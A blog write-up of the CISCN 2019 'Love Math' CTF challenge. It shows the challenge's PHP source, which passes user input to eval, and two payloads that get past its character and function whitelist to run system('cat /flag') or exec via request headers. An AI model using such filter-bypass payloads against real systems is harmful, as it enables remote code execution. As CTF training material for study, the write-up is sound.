首页 > 其他分享 >[CISCN 2019 初赛]Love Math

[CISCN 2019 初赛]Love Math

时间:2024-07-22 10:40:21浏览次数:16  
标签:10 convert Love GET 初赛 flag base pi Math

进入之后直接就是源码

<?php
// 关闭所有错误报告,以防止将敏感信息泄露给用户
error_reporting(0);

// 检查是否传入了 GET 参数 'c'
// 如果没有传入,则显示当前文件的源代码
if (!isset($_GET['c'])) {
    show_source(__FILE__);
} else {
    // 读取 GET 参数 'c' 的值到 $content
    $content = $_GET['c'];

    // 如果 $content 的长度超过 80 字符,则终止执行并输出错误信息
    if (strlen($content) >= 80) {
        die("太长了不会算");
    }

    // 定义一个黑名单字符数组,包含空格、制表符、回车、换行、引号、反引号和方括号
    $blacklist = [' ', '\t', '\r', '\n', '\'', '"', '`', '\[', '\]'];

    // 遍历黑名单字符数组,检查 $content 是否包含任意黑名单字符
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }

    // 定义一个白名单函数数组,包含常用的数学函数
    // 这些函数是允许在用户输入中使用的函数
    $whitelist = [
        'abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 
        'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 
        'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 
        'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 
        'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 
        'sinh', 'sqrt', 'srand', 'tan', 'tanh'
    ];

    // 使用正则表达式匹配 $content 中所有可能的函数名称,并存储在 $used_funcs 数组中
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);

    // 遍历 $used_funcs 数组,检查是否有不在白名单中的函数名
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }

    // 使用 eval 函数计算并输出 $content 的值
    // 注意:eval 函数会执行传入的 PHP 代码,存在严重的安全风险
    eval('echo ' . $content . ';');
}
?>

方法一

有字符限制,有黑白名单
我们要利用

eval('echo ' . $content . ';');

去catflag
首先我们要了解

在 PHP 中,可以通过将函数名存储在一个字符串变量中,然后通过该变量动态调用该函数。这种方法被称为动态函数调用,例如:
$a='system';
$a('cat /flag');
就会执行system('cat /flag')

我们最终要做到的就是

?c=($_GET[pi])($_GET[abs])&pi=system&abs=cat /flag

白名单里有一个函数base_convert()
base_convert() 函数在任意进制之间转换数字
我们可以利用他来创造出hex2bin
hex2bin是由小写字母和数字组成符合36进制的规则
image
可以看出
hex2bin的36进制就是hex2bin
于是我们呢可以将hex2bin的10进制数转为hex2bin然后利用hex2bin再将_GET的转为16进制数转为字符串

base_convert(37907361743,10,36)//hex2bin
dechex(1598506324)//5f474554就是_GET的十六进制
//dechex() 函数将十进制数转换为十六进制数
组成base_convert(37907361743,10,36)(dechex(1598506324))=>hex2bin(5f474554)=_GET
之所以用dechex而不是继续用base_convert是因为有长度限制

构造出_GET接下来就可以直接打了

?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs})&pi=system&abs=cat /flag
//就是:c=$pi=_GET;$_GET['pi']($_GET('abs'))$pi=system&abs=cat /flag
=>c=$pi=_GET;system('cat /flag')$pi=system&abs=cat /flag
最终可以看为system("cat /flag")

方法二

来自
https://www.cnblogs.com/20175211lyz/p/11588219.html
感觉这个方法很好
方法如下
$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

$pi(696468,10,36) => "exec"
$pi(8768397090111664438,10,30) => "getallheaders"
最终exec(getallheaders(){1})
//操作xx和yy,中间用逗号隔开,echo都能输出
echo xx,yy
//getallheaders() 函数返回一个包含所有 HTTP 请求头的关联数组,其中数组的键是请求头的名称,值是对应的请求头值。
就是传
?c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})
在加一个请求头
1:cat /flag

不知道是什莫原因我一直不成功

标签:10,convert,Love,GET,初赛,flag,base,pi,Math
From: https://www.cnblogs.com/dghh/p/18315008

相关文章

  • JAVA Math类详细介绍
    Math类常见方法:1)abs绝对值2)pow求幂3)ceil向上取整4)floor向下取整5)round四舍五入6)sqrt求开方7)random求随机数//思考:请写出获取a-b之间的一个随机整数,a,b均为整数?2-78)max求两个数的最大值9)min求两个数的最小值//1.abs绝对值intabs=Math.abs(-9);Sys......
  • SciTech-Mathematics-Probability+Statistics-Dot products, cosine similarity, text
    Dotproducts,cosinesimilarity,textvectorshttps://dev.to/sayemmh/dot-products-cosine-similarity-text-vectors-2lo4SayemHoque,PostedonOct20,2022Dotproducts,cosinesimilarity,textvectorsCosinesimilarityisameasurebetweentwosingledimen......
  • SciTech-Mathematics-Probability+Statistics-Descriptive stats + percentiles in nu
    DescriptiveStats+percentilesinnumpyandscipy.statshttps://dev.to/sayemmh/descriptive-stats-percentiles-in-numpy-and-scipystats-59a7DEVCommunitySayemHoque,PostedonOct13,2022•UpdatedonNov16,2022Descriptivestats+percentilesinnumpy......
  • SciTech-Mathmatics-Statistics-NumPy and Statistics: Descriptive Statistics
    StatisticsFromNumPyOfficialDocs.https://numpy.org/doc/stable/reference/routines.statistics.htmlOrderstatisticsnumpy.percentilenumpy.percentile(a,q,axis=None,out=None,overwrite_input=False,method='linear',keepdims=False,*,weig......
  • MATH1041 Statistics for Life
    MATH1041 Statistics for Life and Social SciencesTerm 2, 2024MATH1041 AssignmentData:  Together with this document, you should have received your unique dataset in an e-mail sent to your  official university email address. The......
  • Math 263 Department Of Mathematics
    DepartmentOf MathematicsMath 263CalculusIIISummer II 2024CourseOutlinePrerequisite: A grade of C or better in Math 262 or Math 266; or appropriate skill level demonstrated through the math placement process.This final co......
  • [BJDCTF2020]Mark loves cat(源码泄露+命令执行)
    扫描之后发现是/.git源码泄露pythonGitHack.pyhttp://56ad87c1-d8fb-463d-9480-f0fbee5176a0.node5.buuoj.cn:81/.git/之后出现源码查看index.php<?php//包含外部文件'flag.php',可能包含变量$flaginclude'flag.php';//初始化三个变量$yds="dog";//$yd......
  • CodeForces 1992D Test of Love
    题目链接:CodeForces1992D【TestofLove】思路    从起点开始起跳,找出下一个木头的位置,若与当前位置的距离小于等于m,则可以直接跳过去,否则判断当前位置与下一个木头之间有没有鳄鱼,有鳄鱼则不能到达对岸,否则继续查找下一个木头,直到对岸。代码#include<functional>......
  • CSP - Junior 初赛备考手册 如何答题
    本文章将结合CSP2019-2023的题目,本蒟蒻将分享自己的拙见。网络CSP2019T1中国的国家顶级域名是______。A..cnB..chC..chnD..chinaAnswer:A常识问题。二进制运算CSP2019T2二进制数\(11~1011~1001~0111\)和\(01~0110~1110~1011\)进行按位与运算的结果......
  • CF1983E I Love Balls
    题意\(n\)个小球,有\(k\)个特殊小球,两个人轮流随机拿,每个小球有权值,如果拿到特殊球就再拿一个,问两个人的期望得分。题解关键1如果没有特殊小球,那么每个球是等价的,计算期望的时候可以直接用平均值作为一个小球的权值,把每个小球的权值都看成平均值关键2把拿取操作看成一个序......